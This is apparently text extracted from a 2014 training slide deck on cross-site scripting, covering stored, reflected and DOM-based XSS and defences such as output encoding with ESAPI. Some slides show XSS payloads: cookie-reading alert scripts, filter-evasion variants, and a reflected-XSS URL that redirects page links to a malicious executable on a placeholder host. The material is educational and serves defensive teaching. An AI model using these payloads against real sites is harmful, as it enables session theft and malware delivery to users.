TechTalk

FEBRUARY 2014

Cross Site Scripting XSS

DEPARTMENT: ARCHITECTURE AND DEVELOPMENT

2

^

» Introduction» Stored XSS» Reflected XSS» DOM Based XSS» XSS Attack Consequences» How to Protect Yourself

Table of Contents

3

^Introduction

https://www.owasp.org/index.php/Top_10_2013-Release_Notes

4

^

XSS flaws occur whenever» application takes untrusted data and sends it to a web

browser without proper validation and escaping

It allows » attackers to execute scripts in the victim’s browser which can:

» hijack user sessions, » deface web sites, or » redirect the user to malicious sites.

Introduction

5

^Introduction

https://www.youtube.com/watch?v=_Z9RQSnf8-g

6

^

» The injected code is permanently stored on the target servers:» Database» Message forum» Visitor log» Comment field. …

» The victim then retrieves the malicious script from the server when it requests the stored information

Stored XSS Attacks

7

^Stored XSS Attacks

Test XSS, <script>alert(document.cookie)</script>

8

^Stored XSS Attacks

Test XSS, <script>alert(document.cookie)</script>

9

^

» The injected code is reflected off the web server, such as in:» An error message» Search result» An e-mail message» Or any other response that includes some or all of the input sent to

the server as part of the request

Reflected XSS Attacks

10

^Reflected XSS Attacks

http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

11

^Reflected XSS Attacks

Different syntax or enconding

Try to write this script in vulnerables input fields

" onfocus="alert(document.cookie)

"><script >alert(document.cookie)</script >

"%3cscript%3ealert(document.cookie)%3c/script%3e

"><ScRiPt>alert(document.cookie)</ScRiPt>

12

^

» The DOM, or Document Object Model, » is the structural format used to represent documents in a browser.» is the de-facto name for XSS bugs

DOM Based XSS

<script>document.write("Site is at: " + document.location.href + ".");</script>

13

^

» The consequence is the same regardless of whether it is stored, reflected or Dom based.» The most severe XSS attacks involve disclosure of the user’s session

cookie, allowing an attacker to hijack the user’s session and take over the account.

» It can also include the disclosure of end user files» installation of Trojan horse programs» redirect the user to some other page or site» modify presentation of content.

XSS Attack Consequences

14

^

» Escape Output Provided by UsersHTML encode any <, >, &, ‘, “ or don’t allow it

» Validate user data to make sure it meets your expectationsUse an HTML Policy engine to validate or clean user-driven HTML in an outbound way

How to Protect Yourself

Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );

JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );

Thank you for your attention!

16

^

» OWASP YouTube Chanelhttps://www.youtube.com/watch?v=_Z9RQSnf8-g

» OWASPhttps://www.owasp.org/index.php/XSShttps://www.owasp.org/index.php/Testing_for_Cross_site_scripting

» OWASP Protect MEhttps://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

» Obscurity by Security, and Other Techitudes by Adam Jon R.http://adamjonrichardson.com/2012/02/01/improving-xss-cross-site-scripting-prevention-in-four-simple-steps/

Additional Information